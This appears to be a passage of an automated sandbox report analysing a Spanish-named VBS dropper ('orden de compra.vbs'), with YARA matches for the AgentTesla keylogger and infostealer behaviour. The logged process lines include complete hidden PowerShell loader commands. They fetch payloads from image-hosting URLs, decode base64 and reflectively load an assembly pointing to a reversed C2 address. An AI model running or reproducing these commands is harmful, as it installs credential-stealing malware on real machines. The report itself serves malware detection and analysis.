                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00E1A7104_2_00E1A710
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00E14A804_2_00E14A80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00E13E684_2_00E13E68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00E141B04_2_00E141B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00E1DAE04_2_00E1DAE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_062512D84_2_062512D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_06253C304_2_06253C30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_062535484_2_06253548
                  Source: orden de compra.vbsInitial sample: Strings found which are bigger than 50
                  Source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: Process Memory Space: powershell.exe PID: 2656, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 3744, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winVBS@8/6@3/4
                  Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\gK5wA[1].txtJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3336:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4dl4nswl.53v.ps1Jump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\orden de compra.vbs"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: AddInProcess32.exe, 00000004.00000002.2973300391.0000000002AEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: orden de compra.vbsReversingLabs: Detection: 15%
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\orden de compra.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreY
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.orboy/451.342.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.orboy/451.342.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dllJump to behavior
